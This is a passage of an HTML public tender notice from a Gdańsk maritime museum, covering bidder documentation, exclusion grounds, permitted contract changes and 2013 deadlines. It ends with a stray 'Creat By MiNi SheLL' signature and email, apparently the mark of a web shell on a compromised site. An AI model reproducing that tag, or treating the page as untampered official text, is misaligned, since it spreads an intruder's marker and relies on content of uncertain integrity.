a.	robotach ogólnobudowlanych w skład których wchodziły roboty budowlane: prace rozbiórkowe budynków lub ich części lub budowa budynków nowych lub rozbudowa budynków istniejących wraz z wykopami ziemnymi i budową instalacji sieci uzbrojenia podziemnego;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>w ciągu ostatnich 3  lat wykonał przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 2 (dwa) projekty budowlane i wykonawcze wielobranżowe o wartości nie mniejszej niż 60.000 zł netto każdy, gdzie komplet dokumentacji stanowiła dokumentacja składająca się z branż: 
a.	architektonicznej,
b.	konstrukcyjnej,
c.	instalacji sanitarnej, 
d.	elektrycznej, 
e.	elektrycznej - teletechnicznej teleinformatycznej,
f.	elektrycznej - teletechnicznej zabezpieczeń specjalistycznych budynków w instalacje SSWiN, CCTV, SAP, 
a także specyfikacji technicznych wykonania i odbioru robót, przedmiarów i kosztorysów sporządzonych w postaci kalkulacji szczegółowej co najmniej z wydzieleniem poszczególnych grup robót oraz wykazaniem ilości robót, materiału i sprzętu - w dowolnym programie kosztorysowym;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia spełniania warunków udziału w postępowaniu oraz wykazania braku podstaw do  wykluczenia Wykonawcy muszą dostarczyć oświadczenia: 
a)	o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ustawy Pzp i opisanych w pkt. IV niniejszej SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3)	Zamawiający, zgodnie z art. 144 ustawy Pzp przewiduje możliwość dokonania zmian umowy. Zmiany w umowie wynikać mogą w szczególności z tytułu:
a)	zmian nie dotyczących treści oferty, na podstawie której dokonano wyboru Wykonawcy,
b)	aktualizacji rozwiązań ze względu na postęp technologiczny (np. wycofanie z obrotu  materiałów, sprzętu); zmiana nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy; Wykonawca w takim przypadku sporządza protokół konieczności, wymagana jest akceptacja zmiany przez Zamawiającego a w przypadku konfliktu z wydanymi i obowiązującymi warunkami technicznymi i uzgodnieniami organów i instytucji - uzyskanie zmiany uzgodnień warunków lub akceptacja takie zamiany przez organ i instytucję, 
c)	wprowadzenia lub zmiany podwykonawcy robót jeżeli Zamawiający zaakceptuje taką zmianę,
d)	zmiany zakresu zamówienia i wartości, jeżeli konieczność wprowadzenia zmian narzucają przepisy prawa, warunki techniczne, warunki gestorów sieci, uzgodnienia oraz w przypadku jeśli zmiany te są konieczne do uzyskania pozytywnych stanowisk i decyzji administracyjnych organów i instytucji,
e)	zmian kwoty podatku VAT i kwoty brutto w przypadku zmiany przepisów określającej wysokość stawki podatku VAT,
f)	zmian rozwiązań projektowych -  w przypadku ujawnienia błędu w dokumentacji projektowej,
g)	zmian, której wprowadzenie spowoduje obniżenie kosztu utrzymania lub użytkowania Obiektu,
h)	wynagrodzenie umowne może ulec zmniejszeniu w przypadku ograniczenia przez Zamawiającego zakresu przedmiotu umowy lub rezygnacji z części robót (roboty zaniechane) z przyczyn, których nie  przewidywano  w chwili zawarcia umowy; Wykonawcy przysługuje wynagrodzenie tylko za wykonaną część robót,
i)	zmiany terminu, zakresu, kwoty w przypadkach zdarzeń wywołanych czynnikami niezależnymi od właściwości zamawiającego i wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy a które uniemożliwia  Wykonawcy wykonanie w części lub całości jego zobowiązań,
j)	zmiany terminu, zakresu elementów zamówienia na skutek czynności organów administracji  lub innych właściwych instytucji,
k)	zmiany terminów realizacji każdego z elementów zadania wykazanych w par. 16 ust. 1 i 2 umowy przy zachowaniu terminu zakończenia inwestycji wskazanego w par. 16 ust 3 tj. 20.12.2013 r. 
l)	zmiany terminu zakończenia robót budowlanych ze względu na konieczność korekty dokumentacji projektowej, skutkujące koniecznością zmiany rozwiązań i wykonania dodatkowych czynności, do czego niezbędne jest wydłużenie terminu zakończenia robót, 
m)	zmiany terminu zakończenia robót budowlanych ze względu na konieczność wykonania przez Wykonawcę, w ramach odrębnych umów zamówień uzupełniających lub zamówień dodatkowych, o których mowa w art. 67 ust.1 pkt. 5 i 6 ustawy Prawo zamówień publicznych, od których uzależnione jest prawidłowe wykonanie Umowy, o czas niezbędny na wykonanie tych zamówień,
n)	gdy propozycja zmiany jest korzystna dla Zamawiającego, a konieczność wprowadzenia zmiany wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,
o)	przesunięcia terminu wykonania przedmiotu umowy ze względu na konieczność wykonania nieprzewidzianych i koniecznych robót , o ile nie jest możliwe równoległe wykonywanie robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.cmm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centralne Muzeum Morskie w Gdańsku ul. Ołowianka 9-13 80-751 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2013 godzina 09:30, miejsce: SEKRETARIAT CMM ul. Ołowianka 9-13 80-751 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com